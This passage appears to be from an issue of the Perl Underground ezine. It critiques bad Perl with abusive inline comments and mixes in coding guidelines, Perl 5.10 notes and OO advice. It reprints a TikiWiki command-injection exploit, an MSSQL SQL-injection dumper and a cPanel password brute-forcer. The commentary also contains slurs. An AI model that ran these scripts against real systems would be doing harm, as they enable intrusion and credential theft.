[target]/n"; print " [target] (ex. http://127.0.0.1/tikiwiki)/n"; print " [proxy] (ex. 0.0.0.0:8080)/n"; exit; # You could have used a text area with a die instead of all those # print's followed by an exit. If you're going to use print, # at least change your quoting style. } sub exploit() { my($target, $command, $proxy) = @_; # Not bad. my $cmd = 'echo start_er;'.$command.';'.'echo end_er'; # There's the correct use of the . operator! But you forgot the whitespace! # So close, but yet so far... my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd)); # You don't need to assign to $_, and in different situations that # would be hazardous my $conn = LWP::UserAgent->() or die; # Good use of or there # instead of ||. I see that you have been paying attention to our # previous issues. :) $conn->agent("Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)"); $conn->proxy("http", "http://".$proxy."/") unless !$proxy; # Try the 'not' keyword instead of '!'. And way to be convoluded. # $conn->proxy(..) if $proxy; # just way to clear for you. # I know that coding obfuscated Perl is a pasttime for most Perly types, # but you hardly fall into that category my friend. my $out=$conn->get($target."/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f []=x.tan.passthru($byte).die()&t=png&title="); # Way to be consistant with your concaticnations there. if ($out->content =~ m/start_er(.*?)end_er/ms) { # Perl doesn't need to be told it's a match print $1 . "/n"; } else { print "[-] Exploit Failed/n"; # Just like this code... exit; # Why not try die? After all, you don't want to exit # indicating success when it didn't succeed. } } # milw0rm.com [2007-10-12] # PU5 -[0x0F] # Abigail goes stylish ------------------------------------------- ( It is important to note that this is old, and some things about the language have changed. Further, a handful of these points were never the popular view in the Perl world. So keep those in mind. ) ~~~~~~~~~~~~~~~~ Last week, hakkr posted some coding guidelines which I found to be too restrictive, and not addressing enough aspects. Therefore, I've made some guidelines as well. These are my personal guidelines, I'm not enforcing them on anyone else. ~ Warnings SHOULD be turned on. ~ Turning on warnings helps you finding problems in your code. But it's only useful if you understand the messages generated. You should also know when to disable warnings - they are warnings after all, pointing out potential problems, but not always bugs. ~ Larger programs SHOULD use strictness. ~ The three forms of strictness can help you to prevent making certain mistakes by restricting what you can do. But you should know when it is appropriate to turn off a particular strictness, and regain your freedom. ~ The return values of system calls SHOULD be checked. ~ NFS servers will be down, permissions will change, file will disappear, disk will fill up, resources will be used up. System calls can fail for a number of reasons, and failure is not uncommon. Programs should never assume a system call will succeed - they should check for success and deal with failures. The rare case where you don't care whether the call succeeded should have a comment saying so. All system calls should be checked, including, but not limited to, close, seek, flock, fork and exec. ~ Programs running on behalf of someone else MUST use tainting; Untaining SHOULD be done by checking for allowed formats. ~ Daemons listening to sockets (including, but not limited to CGI programs) and suid and sgid programs are potential security holes. Tainting can help securing your programs by tainting data coming from untrusted sources. But it's only useful if you untaint carefully: check for accepted formats. ~ Programs MUST deal with signals appropriately. ~ Signals can be sent to the program. There are default actions - but they are not always appropriate. If not, signal handlers need to be installed. Care should be taken since not everything is reentrant. Both pre-5.8.0 and post-5.8.0 have their own issues. ~ Programs MUST deal with early termination appropriately. ~ END blocks and __DIE__ handlers should be used if the program needs to clean up after itself, even if the program terminates unexpectedly - for instance due to a signal, an explicite die or a fatal error. ~ Programs MUST have an exit value of 0 when running succesfully, and a non-0 exit value when there's a failure. ~ Why break a good UNIX tradition? Different failures should have different exit values. ~ Daemons SHOULD never write to STDOUT or STDERR but SHOULD use the syslog service to log messages. They should use an appropriate facility and appropriate priorities when logging messages. ~ Daemons run with no controlling terminal, and usually its standard output and standard error disappear. The syslog service is a standard UNIX utility especially geared towards daemons with a logging need. It allows the system administration to determine what is logged, and where, without the need to modify the (running) program. ~ Programs SHOULD use Getopt::Long to parse options. Programs MUST follow the POSIX standard for option parsing. ~ Getopt::Long supports historical style arguments (single dash, single letter, with bundling), POSIX style, and GNU extensions. Programs should accept reasonable synonymes for option names. ~ Interactive programs MUST print a usage message when called with wrong, incorrect or incomplete options or arguments. ~ Users should know how to call the program. ~ Programs SHOULD support the --help and --version options. ~ --help should print a usage message and exit, while--version should the version number of the program. ~ Code SHOULD have an exhaustive regression test suite. ~ Regression tests help catch breakage of code. The regression tests should 'touch' all the code - that is, every piece of code should be executed when running the regression suite. All border should be checked. More tests is usually better than less test. Behaviour on invalid inputs needs to be tested as well. ~ Code SHOULD be in source control. ~ And a code source control tool will take care of keeping track of a history or changes log, version numbers and who made the most recent change(s). ~ All database modifying statements MUST be wrapped inside a transaction. ~ Your data is likely to be more important than the runtime or codesize of your program. Data integrety should be retained at all costs. ~ Subroutines in standalone modules SHOULD perform argument checking and MUST NOT assume valid arguments are passed. ~ Perl doesn't compile check the types of or even the number of arguments. You will have to do that yourself. ~ Objects SHOULD NOT use data inheritance unless it is appropriate. ~ This means that "normal" objects, where the attributes are stored inside anonymous hashes or arrays should not be used. Non-OO programs benefit from namespaces and strictness, why shouldn't objects? Use objects based on keying scalars, like fly-weight objects, or inside-out objects. You wouldn't use public attributes in Java all over the place either, would you? ~ Comments SHOULD be brief and to the point. ~ If you need lots of comments to explain your code, you may consider rewriting it. Subroutines that have a whole blob of comments describing arguments are return values are suspect. But do document invariants, pre- and postconditions, (mathematical) relationships, theorems, observations and other relevant things the code assumes. Variables with a broad scope might warrant comments too. ~ POD SHOULD NOT be interleaved with the code, and is not an alternative for comments. ~ Comments and POD have two different purposes. Comments are there for the programmer. The person who has to maintain the code. POD is there to create user documentation from. For the person using the code. POD should not be interleaved with the code because this makes it harder to find the code. ~ Comments, POD and variable names MUST use English. ~ English is the current Lingua Franca. ~ Variables SHOULD have an as limited scope as is appropriate. ~ "No global variables", but better. Just disallowing global variables means you can still have a loop variant with a file-wide scope. Limiting the scope of variables means that loop variants are only known in the body of the loop, temporary variables only in the current block, etc. But sometimes it's useful for a variable to be global, or have a file-wide scope. ~ Variables with a small scope SHOULD have short names, variables with a broad scope SHOULD have descriptive names. ~ $array_index_counter is silly; for (my $i = 0; $i < @array; $i ++) { .. } is perfect. But a variable that's used all over the place needs a descriptive name. ~ Constants (or variables intended to be constant) SHOULD have names in all capitals, (with underscores separating words), so SHOULD IO handles. Package and class names SHOULD use title case, while other variables (including subroutines) SHOULD use lower case, words separated by underscores. ~ This seems to be quite common in the Perl world. ~ Custom delimiters SHOULD be tall and skinny. ~ /, !, | and the four sets of braces are acceptable, #, @ and * are not. Thick delimiters take too much attention. An exception is made for: q $Revision: 1.1.1.1$, because RCS and CVS scan for the dollars. ~ Operators SHOULD be separated from their operands by whitespace, with a few exceptions. ~ Whitespace increases readability. The exceptions are: Unary +, -, /, ~ and !. No whitespace between a comma and its left operand. Note that there is whitespace between ++ and -- and their operands, and between -> and its operands. ~ There SHOULD be whitespace between an indentifier and its indices. There SHOULD be whitespace between successive indices. ~ Taking an index is an operation as well, so there should be whitespace. Obviously, we cannot apply this rule in interpolative contexts. ~ There SHOULD be whitespace between a subroutine name and its parameters, even if the parameters are surrounded by parens. ~ Again, readability. ~ There SHOULD NOT be whitespace after an opening parenthesis, or before a closing parenthesis. There SHOULD NOT be whitespace after an opening indexing bracket or brace, or before a closing indexing bracket or brace. ~ That is: $array [$key], $hash {$key} and sub ($arg). ~ The opening brace of a block SHOULD be on the same line as the keyword and the closing brace SHOULD align with the keyword, but short blocks are allowed to be on one line. ~ This is K&R style bracing, except that we require it for subroutines as well. We do allow map {$_ * $_} @args to be on one line though. No cuddled elses or elsifs. But the while of a do { } while construct should be on the same line as the closing brace. It just looks better that way! ;-) ~ Indents SHOULD be 4 spaces wide. Indents MUST NOT contain tabs. ~ 4 spaces seems to be an often used compromise between the need to make indents stand out, and not getting cornered. Tabs are evil. ~ Lines MUST NOT exceed 80 characters. ~ There is just no excuse for that. More than 80 characters means it will wrap in too many situations, leading to hard to read code. ~ Align code vertically. ~ This makes code look more pleasing, and it brings attention to the fact similar things are happening on close by lines. Example: my $var = 18; my $long_var = "Some text"; This is just a first draft. I've probably forgotten some rules. -[0x10] # It's h4cky0u, not c0dey0u -------------------------------------- #!/usr/bin/perl use LWP::UserAgent; # No warnings? No lexical variables? # Haven't you people learned yet?!? print "/n ----------------------------- "; print "/n MSSQL Dumper v0.1.1 "; print "/n ALPHA "; print "/n By Illuminatus for h4cky0u "; print "/n ----------------------------- "; print "/n"; # Ahhh yes... the always needed eleet startup banner proudly proclaiming # that this shitty code was done by a # shitty coder for an equally shitty site/group. my $ua = LWP::UserAgent->new; # Ripped right from the man page... $colcount = 0; sub args{ print "Hostname (e.g www.site.com):";$host = <STDIN>;chomp $host; print "Path (e.g /products.asp?catid=):";$path = <STDIN>;chomp $path; print "Database:";$db = <STDIN>;chomp $db; print "Database table:";$table = <STDIN>;chomp $table; print "How many columns would you like to dump:";$colnum = <STDIN>;chomp $colnum; print "Column names (format: User,Password):";$colnames = <STDIN>;chomp $colnames;@cols = split(/,/, $colnames); print "Records to dump (format: 1-23):";$rec = <STDIN>;chomp $rec;@recs = split (/-/, $rec); $count = @recs[0]; # ... Don't ever let him near a Perl interpreter again. # I loved the spacing in that subroutine. And the way he got that # input was amazing! # Hey, Illuminatus try: chomp(my $foo = <STDIN>); # And do you see that enter key on your keyboard? Use it next time buddy. # Maybe nexttime try command line arguments, hmm? # perldoc -f shift # man Getopt::Long } sub getrecord{ while($colcount < $colnum){ # Package vars... my $url = "http://".$host.$path."1+AND+(select+cast(CHAR(+127+)%2b+rtrim(cast((selec t+ISNULL(cast(".@cols[$colcount]."+as+varchar)%2c'null')+from+(select+top+ 1+*++from+(select+TOP+".$count."+*+from+".$db."..customers+order+by+1+desc +)+dtable+order+by+1+asc)+finaltable)+as+varchar))%2b+CHAR(+127+)+as+int)) +%3d+1++Or+3%3d6"; my $response = $ua->get($url); my $content = $response->content; # Why are things suddenly lexical? # Cause you stole things right from the POD, you fucker if($content =~ m/value(.*)to/) { # You don't need to tell Perl its # got to match something genius. open (RECORDS, '>>output.txt'); # And you claim to be a # security guy... print RECORDS $1; close (RECORDS); # Nice parens there. } $colcount++; } open (RECORDS, '>>output.txt'); print RECORDS "$count/n"; close (RECORDS); # ... *sigh* } args(); while ($count < @recs[1]){ # Oh jesus.. getrecord(); $count++; $colcount = 0; # here we thought this was a waste # then we realized you were using it in getrecord(), # because you don't know how to send parameters to subs # You can't program. Get lost. } print "Records saved to output.txt"; # No "/n" ? # Do yourself a favor and save coding Perl for those of us who know how, # okay? -[0x11] # Modern impressions of Perl ------------------------------------- It has been an interesting development that while the world is warming up to interpreted languages such as Python and Ruby, Perl support has not increased very much. This can be blamed, in large part, on Perl not having any shocking fresh releases recently. Au contraire, we have been waiting on Perl 6 for a long, long time. Perl is further hindered by its history: who wants to use the web language of the 1990s? In the 90s, when people wanted to write truly horrible HTML generators, they came to Perl. If this is the Perl you remember, it's time to take a step back and realize how much more Perl was, and how much more it is today. I'm here to tell you the inside part of that story. Perl can more than compete with other current languages. Further, Perl is an elite language, above and beyond its competitors in significant ways. Perl has been around for 20 years. 20 years of development. Ruby and PHP are just trying to grasp unicode, for Christ's sake. That's a long way from Perl having NATIVE unicode support since 2000. Just how much better Perl's unicode support is (a LOT better) could fill another rant, but that isn't the point - it is just an example of Perl's maturity. See, maturity is an important concept. If you code Perl, you can build off of 20 years of Perl-specific knowledge. The understanding of best practices in Perl has evolved to an art form. Many of the very gurus who slowly developed their knowledge over this time are still around, easily accessible. The actual Perl interpreter is something to be admired, and has undergone so many years of inspection (but is *still* being improved internally, including many ways for Perl 5.10). Perl has CPAN (or "the CPAN" to purists). CPAN is an archive of Perl modules, and no other language has anything like it at that scale. CPAN has over 13,000 modules. Many of these have been developed for years, and are very stable. There are even websites out there to critique Perl modules, and evaluate their code quality. To put this in perspective, Python has a "package index", pypi, with over 3500 packages. However, these aren't modules - many are just random pieces of Python that currently complete some task. Some are good, but the general level of quality is much lower than the Perl source on CPAN. And they lack the amount or the time of review that happens with Perl modules. This isn't a knock on Python - you'd be hard pressed to find another language that does better in these areas. Perl is just way ahead of the field when it comes to libraries and community. Why does this matter? Because if you use almost any language, you end up in Lone Ranger mode - you have a base set of tools that you can trust, but otherwise you are on your own. C is an obvious example, where you have a slim standard library for small tasks, and you can probably find some code online that does something like what you want to do. Coding in Python is like this, just to a lesser degree. You might find what you want on Pypi, if you're not doing something too original, but it could be shady, badly designed, unreliable, and very poorly investigated. On the other hand, in Perl you have a wide variety of well-established modules, that are not only good, but are likely to be better than you would make. You are not only creating more stable code by building off of others' code, but you are more likely to be coding more "high level". That is, focusing on issues of structure, design, interface, and others. Perl is well-documented. Very well-documented. Everything from the internal workings, to the internal API, to the language, to the language functions, to any respectable module, to everything else, is documented. On top of that, the world has built up an incredible amount of archived Perl information. Perl is portable. Your Perl code is very likely to work on any box that has Perl installed, and has the modules you need. Perl (the program) will compile on a massive list of operating systems. You can find pre-compiled binaries for a similar list, see http://www.cpan.org/ports/. Most Perl code will not need modifications to work on other operating systems, let alone modifications just to "compile" it (like you would with much C). The language itself is very powerful. You can chain references as deep as you want to create any kind of data structure you would like. You can generate and pass anonymous subroutines. Perl has better regular expressions than anywhere else, and have continued to lap the field with Perl 5.10 improvements. Modules are easy to create and inherit from. The language is incredibly flexible to use, and everything is easy. And on and on and on. Perl makes it much easier to write correct and secure code than most languages. On top of simply being a well-developed, mature, interpreted language, Perl provides strict, warnings, and taint mode to assist you. Coding in Perl goes long past just trying to make it work - that's often incredibly easy. Perl coding becomes about just how to make it work, to be clean, resource friendly, and maintainable. Combined with the extensive code archive and well-established practices, Perl is a very high-level language. Perl is popular. It doesn't have the popularity of C*, .NET, or Java, but it also doesn't have massive corporate backing nor is it taught extensively by colleges. Perl is the king of interpreted languages, and if you are a good coder who codes good Perl, there is a job out there for you. So if you are tired of dealing with the bugs of your language, or you're tired of spending a majority of your coding effort on menial tasks, try Perl. Look at other languages too - Python, Ruby, C, Java, these are all fine languages with positive sides, and they might be right for your project. But don't hold an old, outdated, prejudice against Perl. Remember that while other languages have developed quickly, they are still playing catch-up, while the last few years of work on Perl can be seen as invested in Perl 5.10 and Perl 6, both of which are big improvements from whatever Perl you remember. -[0x12] # Some wit about iterators --------------------------------------- Recursive algorithms are often simple and intuitive. Unfortunately, they are also often explosive in terms of memory and execution time required. Take, for example, the N-choose-M algorithm: # Given a list of M items and a number N, # generate all size-N subsets of M sub choose_n { my $n = pop; # Base cases return [] if $n == 0 or $n > @_; return [@_] if $n == @_; # otherwise.. my ($first, @rest) = @_; # combine $first with all N-1 combinations of @rest, # and generate all N-sized combinations of @rest my @include_combos = choose_n(@rest, $n-1); my @exclude_combos = choose_n(@rest, $n); return ( (map {[$first, @$_]} @include_combos) , @exclude_combos ); } Great, as long as you don't want to generate all 10-element subsets of a 20-item list. Or 45-choose-20. In those cases, you will need an iterator. Unfortunately, iteration algorithms are generally completely unlike the recursive ones they mimic. They tend to be a lot trickier. But they don't have to be. You can often write iterators that look like their recursive counterparts — they even include recursive calls — but they don't suffer from explosive growth. That is, they'll still take a long time to get through a billion combinations, but they'll start returning them to you right away, and they won't eat up all your memory. The trick is to create iterators to use in place of your recursive calls, then do a little just-in-time placement of those iterator creations. So let's take a first stab at choose_n. First, our base cases are going to be subs that return whatever they were returning before, but after returning those values once, they don't return anything anymore: sub iter_choose_n { my $n = pop; # Base cases my $once = 0; return sub {$once++ ? () : []} if $n == 0 or $n > @_; my ($first, @rest) = @_; return sub {$once++ ? () : [$first, @rest]} if $n == @_; Apart from the iterator trappings, we've got essentially what we had before. Converting the map into an iterator involves some similar work, but the parallels are still pretty obvious. We exhaust the first iterator before turning to the second: # otherwise.. my $include_iter = iter_choose_n(@rest, $n-1); my $exclude_iter = iter_choose_n(@rest, $n); return sub { if (my $set = $include_iter->()) { return [$first, @$set]; } else { return $exclude_iter->(); } } We now have a recursively-defined iterator that wasn't a heck of a lot more complex than our original algorithm. That's the good news. The bad news is: it's still doubly recursive, O(2^N) in space and time, and so will take a long time to start generating data. Time for a little trick. Because we don't use $exclude_iter until we've exhausted $include_iter, we can delay defining it: # otherwise.. my $include_iter = iter_choose_n(@rest, $n-1); my $exclude_iter; return sub { if (my $set = $include_iter->()) { return [$first, @$set]; } else { $exclude_iter ||= iter_choose_n(@rest, $n); return $exclude_iter->(); } } } Now our code is singly recursive, O(N) in space and time to generate an iterator, and that makes a big difference. Big enough that you probably won't need to go to the trouble of coming up with an O(1) truly iterative solution. Of course, if you complete the iterations, eventually you will have generated those 2^N subs, and they'll clog up your memory. You may not be concerned about that (you may not be expecting to perform all that many iterations), but if you are, you can put a little code in to free up exhausted iterators: # otherwise.. my $include_iter = iter_choose_n(@rest, $n-1); my $exclude_iter; return sub { if ($include_iter and my $set = $include_iter->()) { return [$first, @$set]; } else { if ($include_iter) { undef $include_iter; $exclude_iter = iter_choose_n(@rest, $n); } return $exclude_iter->(); } } } -[0x13] # Some gumhead named Gumbie -------------------------------------- =pod From: [email protected] Subject: Your zine Fellow dispensers of justice, Not all of our spoils from our hacks make it into our zine. Some of them are left out simply because they are dull; others are left out due to space constraints and still others are omitted because we cannot think of a good way to present them, or we know someone who can do it better. This is one such case. During our romp through the HellBound Hackers' IRC network, we came across this Perl script that one of the IRC opers/server admins there (specifically Gumbie) had written in an attempt to catch people running privileged processes on his servers. The code quality was terrible, and provided us for a good laugh. There were also various design issues. Come on, a monitoring program that does no integrity checking of its logs or itself? Not to mention that the whole concept of the program screams "1992". In any event, we decided to email this to you, and let the real experts of the field handle this one. Hope it amuses you as well as your readers. --ZF0 =cut # Sure thing. # For future reference, we encourage material contributions (and rarely # turn them down, even if the target is some random loser we've never # heard of. # Did you do all this tabbing yourselves or did it come like this? #!/usr/bin/perl # Dump all the information in the current process table use Proc::ProcessTable; # Oh god, package variables! Run for your lives! $t = new Proc::ProcessTable; @list = ""; # Now that's eleet right there. @exclude = (1001); # ... and so is that foreach $p (@{$t->table}) { # Not bad.. but foreach() ? C'mon... # get with the times! for() # print "--------------------------------/n"; # fill array will all the euid root procs foreach $f ($t->fields){ # See the above comment # print $f, ": ", $p->{$f}, "/n"; if (($f =~ /euid/) && ($p->{$f} eq 0)){ # && eh? Try using the # 'and' operator. And way to use a string comparison # expression in a numeric comparison. push(@list, $p); # Learn Perl's grep, cum rag. } } } #print @list foreach $p (@list) { # You really like foreach(), don't you? # print "--------------------------------/n"; # print "pid: ", $p->{pid}, " uid: ", $p->{uid}, " euid: ", $p->{euid}, " ppid: "; # print $p->{ppid}, " ", $p->{cmndline}, "/n"; # Find all the ones not direct children of init if (($p->{ppid} != 1) && ($p->{ppid} != 0)) { # Hey, you got the right comparison types! But you still used && # and you didn't need the != 0 in the second # Or just do -> if ($p->{ppid} > 1) # print "pid: ", $p->{pid}, " ppid: ", $p->{ppid}, "/n"; push(@cmp, $p); # Do all these arrays bother anyone else? } } # Lets find all the parent owners foreach $c (@cmp) { foreach $p (@{$t->table}) { #print $p->{pid},"/n"; if ($c->{ppid} eq $p->{pid}) { # Again, it's a PID, therefore it's *numeric*. Why are you using eq ? if (($p->{ppid} != 1) && ($p->{ppid} != 0)) { # if ($p->{ppid} > 1) { #print $p->{ppid}, "/n"; foreach $o (@{$t->table}) { # Good god... if ($o->{pid} eq $p->{ppid}) { #print $o->{pid}, "/n"; $puid = $o->{uid}; } } # if ($puid) { if ($puid != 0) { undef $flag; # Real slick gumbie. Real slick. foreach $e (@exclude) { if ($e eq $puid) { $flag = 1; } # Yea. That's totally how we do oneline if()'s in Perl. } if (!defined($flag)) { # Lose the '!' and go with 'not'. And you don't need the defined() function print "e: ", $e, " pid: ", $p->{pid}, " ppid: ", $p->{ppid}; # No newline? print " puid: ", $puid, " Name: ",$p->{cmndline}, "/n"; #kill SIGKILL, $p->{pid}; $date = `date`; # Because Perl doesn't have builtin functions for that. chomp $date; # Because you can't oneline that. open(LOGFILE, ">>/home/gumbie/.sec/log"); # What is it with people's obsession with not using the three # argument open() call or checking its return status? print LOGFILE "<===Tiggered by UID: $puid, PID $p->{pid} killed successfully at $date ===>/n/n"; # Anyone want to edit a logfile? close LOGFILE; } undef $flag; # Nice. Classy. } } } } } # No exit? # Wow that was shitty. All those pointless loops and random variables. It # was a nightmare to follow. # Please, gumbie, do the world a favor and never code anything ever again. -[0x14] # The promised Perl 5.10 details, from grinder ------------------- Here are some things of the top of my head that I think are pretty cool: state variables No more scoping variables with an outer curly block, or the naughty my $f if 0 trick (the latter is now a syntax error). defined-or No more $x = defined $y ? $y : $z, you may write $x = $y // $z instead. regexp improvements Lots of work done by dave_the_m to clean up the internals, which paved the way for demerphq to add all sorts of new cool stuff. smaller variable footprints Nicholas Clark worked on the implementations of SVs, AVs, HVs and other data structures to reduce their size to a point that happens to hit a sweet spot on 32-bit architectures smaller constant sub footprints Nicholas Clark reduced the size of constant subs (like use constant FOO => 2). The result when loading a module like POSIX is significant. stacked filetests you can now say if (-e -f -x $file). Perl 6 was supposed to allow this, but they moved in a different direction. Oh well. lexical $_ allows you to nest $_ (without using local). _ prototype you can now declare a sub with prototype _. If called with no arguments, gets fed with $_ (allows you to replace builtins more cleanly). x operator on a list you can now say my @arr = qw(x y z) x 4. (Update: this feature was backported to the 5.8 codebase after having been implemented in blead, which is how Somni notices that it is available in 5.8.8). switch a true switch/given construct, inspired by Perl 6 smart match operator (~~) to go with the switch closure improvements dave_the_m thoroughly revamped the closure handling code to fix a number of buggy behaviours and memory leaks. faster Unicode lc, uc and /i are faster on Unicode strings. Improvements to the UTF-8 cache. improved sorts inplace sorts performed when possible, rather than using a temporary. Sort functions can be called recursively: you can sort a tree map in void context is no longer evil. Only morally. less opcodes used in the creation of anonymous lists and hashes. Faster pussycat! tainting improvements More things that could be tainted are marked as such (such as sprintf formats) $# and $* removed Less action at a distance perlcc and JPL removed These things were just bug magnets, and no-one cared enough about them. update: ok, in some ways that's just a rehash of perldelta, here's the executive summary: There has been an awful lot of refactoring done under the hood. Andy "petdance" Lester added const to just about everything that it was possible to do, and in the process uncovered lots of questionable practices in the code. Similarly, Nicholas Clark and Dave Mitchell nailed down many, many, many memory leaks. Much of the work done to the internals results in a much more robust engine. Far likelier err, less likely, to leak, or, heavens forbid, dump core. If you have long running processes that chew through datasets and/or use closures heavily, that is a good reason to upgrade. For new developments, there are a number of additions at the syntax level that make writing Perlish code even better. Things like Mark-Jason Dominus's book on Higher Order Perl makes heavy use of constructs such as closures that tend to leak in 5.8. If this style of programming becomes more widespread (and I hope it does, because it allows one to leverage the power of the language in extraordinary ways) then 5.10 will be a better fit. Years ago, having been bitten by nasty things in 5.6, I asked Does 5.8.0 suck?. As it turns out, it didn't. I think that 5.10 won't suck, either. One big thing that has changed then is that far more people are smoking all sorts of weird combinations of build configurations on a number of different platforms, and many corrections are being made as a result of that. Things that otherwise would have forced a 5.10.1 to be pushed out in short order. -[0x15] # Reading material ----------------------------------------------- There is a common misinterpretation that Perl Underground is just here to make people feel bad about themselves. That isn't true. We're genuinely interested in advocating Perl use, and improved Perl programming. We just aren't being nice about it. Then again, the people who talk shit about us probably just read the TOC and the insults of themselves or people they know. People need to go back to the basics. Read some documentation. I'll even provide links to the cute online perldoc. Syntax - http://perldoc.perl.org/perlsyn.html Data types - http://perldoc.perl.org/perldata.html Subroutines - http://perldoc.perl.org/perlsub.html Operators - http://perldoc.perl.org/perlop.html Functions - http://perldoc.perl.org/perlfunc.html Regex - http://perldoc.perl.org/perlre.html References - http://perldoc.perl.org/perlref.html Structures - http://perldoc.perl.org/perldsc.html That's a really great list to go over. There's something entertaining for everybody. Some have been updated for Perl 5.10. Have some fun and read everything else on perldoc.perl.org. -[0x16] # Hessam-x needs schooling (and not just for English) ------------ Perl Underground talk about exploiters perl codes. in this ezine they focused on bad perl codes. this is really nice . Read this ezine on milw0rm.com # The above quote comes from Hessam-x' website from quite a while back. # It's good that he likes our zine, we like that, but all the more reason # to make sure he improves his Perl! #!/usr/bin/perl # Cpanel Password Brute Forcer # ---------------------------- # (c)oded By Hessam-x # Perl Version ( low speed ) # Oerginal Advisory : # http://www.simorgh-ev.com/advisory/2006/cpanel-bruteforce-vule/ use IO::Socket; use LWP::Simple; use MIME::Base64; # Need we say it? strict and warnings. # my ($host, $user, $port, $list, $file) = @ARGV; # you could at least be shifting $host = $ARGV[0]; $user = $ARGV[1]; $port = $ARGV[2]; $list = $ARGV[3]; $file = $ARGV[4]; $url = "http://".$host.":".$port; # Do this check BEFORE the assignments if(@ARGV < 3){ # I like the random capitalization decisions. print q( ############################################################### # Cpanel Password Brute Force Tool # ############################################################### # usage : cpanel.pl [HOST] [User] [PORT] [list] [File] # #-------------------------------------------------------------# # [Host] : victim Host (simorgh-ev.com) # # [User] : User Name (demo) # # [PORT] : Port of Cpanel (2082) # # [list] : File Of password list (list.txt) # # [File] : file for save password (password.txt) # # # ############################################################### # (c)oded By Hessam-x / simorgh-ev.com # ############################################################### );exit;} headx(); # Why would you quote a number? Because it's negative?? $numstart = "-1"; sub headx() { print q( ############################################################### # Cpanel Password Brute Force Tool # # (c)oded By Hessam-x / simorgh-ev.com # ############################################################### ); # Put some of your own fucking blank lines in here # Not to mention either your adamant refusal to indent, or your # inability to publish on the internet. We don't care to figure # out which one is screwing this code. # Lame open format, and lame that you just read and then process. # while ( <$passfile> ) { # etc open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !"; @PASSWORDS = <PASSFILE>; close PASSFILE; foreach my $P (@PASSWORDS) { chomp $P; # uh... $passwd = $P; # uh... print "/n [~] Try Password : $passwd /n"; &brut; }; } sub brut() { # How about you learn how to send parameters to functions, retard $authx = encode_base64($user.":".$passwd); print $authx; # How could you recommend PU and not even know to not # unnecessarily quote variables? my $sock = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print "/n [-] Can not connect to the host"; # Is it offtopic to point out that you should have a host request, # and be using CRLFs, for starters? print $sock "GET / HTTP/1.1/n"; print $sock "Authorization: Basic $authx/n"; print $sock "Connection: Close/n/n"; read $sock, $answer, 128; close($sock); if ($answer =~ /Moved/) { print "/n [~] PASSWORD FOUND : $passwd /n"; exit(); } } # Was there a single line in that whole script that didn't suck like a horny # paki? Short and shitty. We went extra easy because you're a fan :-D -[0x17] # Ovid discusses object-oriented programming --------------------- NAME Often Overlooked Object Oriented Programming Guidelines SYNOPSIS The following is not about how to write OO code in Perl. There's plenty of nodes covering that topic. Instead, this is a general list of tips that I like to keep in mind when I'm writing OO code. It's not exhaustive, but it does cover a number of areas that I see many people (including myself), get wrong or overlook. PROBLEMS Useless OO Don't use what you don't need. Don't use OO if you don't need it. No sense in creating an object if there is nothing to encapsulate. sub new { my ($class,%data) = @_; return bless /%data, $class; } This constructor is not unusual, but it's suggestive of a useless use of OO. A good example of this is Acme::Playmate (er, maybe not the best example). The module is comprised of a constructor. That's it. And here's the documented usage: use Acme::Playmate; my $playmate = new Acme::Playmate("2003", "04"); print "Details for playmate " . $playmate->{ "Name" } . "/n"; print "Birthdate" . $playmate->{ "BirthDate" } . "/n"; print "Birthplace" . $playmate->{ "BirthPlace" } . "/n"; Regardless of whether or not you feel this is a useful module, there's nothing OO about it. In fact, with the exception of methods this module inherits from UNIVERSAL::, it has no methods other than the constructor. All it does is return a data structure that just happens to be blessed (the jokes are obvious; we don't need to go there). Of course, this is merely an Acme:: module, so discussing how well a joke conforms to good programming practices is probably not warranted, but read through Damian Conway's 10 Rules for When to Use OO to get a good feel for when OO is appropriate. Object Heirarchy Don't subclass simply to alter data Subclass when you need a more specific instance of a class, not just to change data. If you do that, you simply want an instance of the object, not a new class. Subclass to alter or add behavior. While I don't see this problem a lot, I see it enough that it merits discussion. package Some::User; sub new { bless {}, shift; } sub user { die "user() must be implemented in subclass" } sub pass { die "pass() must be implemented in subclass" } sub url { die "url() must be implemented in subclass" } On the surface, this might appear to simply be an interface that will be used as a base class for a set of classes. However, sometimes people get confused and simply override those methods to return data: package Some::User::Foo; sub user { 'bob' } sub pass { 'seKret' } sub url { '<a href="http://somesite.com/">http://somesite.com/</a>' } There's really no reason for that. Make it an instance: my $foo = Some::User->new('Foo'); Thus, if you need to change how things work internally, you're doing that on only one class rather than hunting through a bunch of useless subclasses. Law of Demeter The Law of Demeter simply states that you should only talk to your immediate friends -- using a chain of method calls to navigate an object heirarchy is begging for trouble. For example, if an office object has a manager object, an instance of that manager might have a name. print $office->manager->name; That seems all fine and dandy. Now, imagine that you have that in 20 places in your code, but in the manager class, someone changes name to full_name. Because the code using the office object was forced to walk through the object heirarchy to get at the data it actually needs, you've created fragile code. Now the manager class must support a name method to be backwards compatible (and we get to start on our big ball of mud), or every reference to it must be changed -- but we've created far too many. The solution is to do this: print $office->manager_name; # manager_name calls $manager->name Now, instead of hunting down all of the places where this was accessed, we've limited this call to one spot and made maintenance much easier. This can, however, lead to code bloat. Make sure you understand the tradeoffs involved. Liskov substitution principle While there is disagreement over what this means, this principle states (paraphrasing) that a subclass must present the same interface as its superclass. Some argue that the behavior or subclasses (or subtypes) should not change, though I feel that with proper encapsulation, this distinction goes away. For example, imagine a cash register program where a person's order is paid via a combination of credit card, check, and cash (such as when three people annoy the waiter by splitting the bill). foreach my $tender (@tenders) { $tender->apply($order); } In this case, let's assume there is a Tender::Cash superclass and subclasses along the lines of Tender::CreditCard and Tender::LetsHopeThisDoesntBounce. The credit card and check classes can be used exactly as if they were cash. Their apply() methods are probably different internally, but every method that's available for cash should be available for the subclasses and data which is returned should be identical in form. (this might be a bad example as a generic Tender interface may be more appropriate). Another example is HTML::TokeParser::Simple. This is a drop-in replacement for HTML::TokeParser. You don't need to change the actual code, but you can then use all of the extra nifty features built in. Methods Don't encourage promiscuous behavior Hide your data, even that data which is public. Provide setters and getters for properties (accessors and mutators, if you prefer), rather than allowing people to reach into the object. Use these internally, too. You need them as much as users of your code need them. $object->{foo}; This is a common idiom, but it's an example of an anti-pattern. What happens when you want to change that to an array ref? What happens when you want to use inside-out objects? What happens when you want to validate an assignment to this value? All of these issues and more 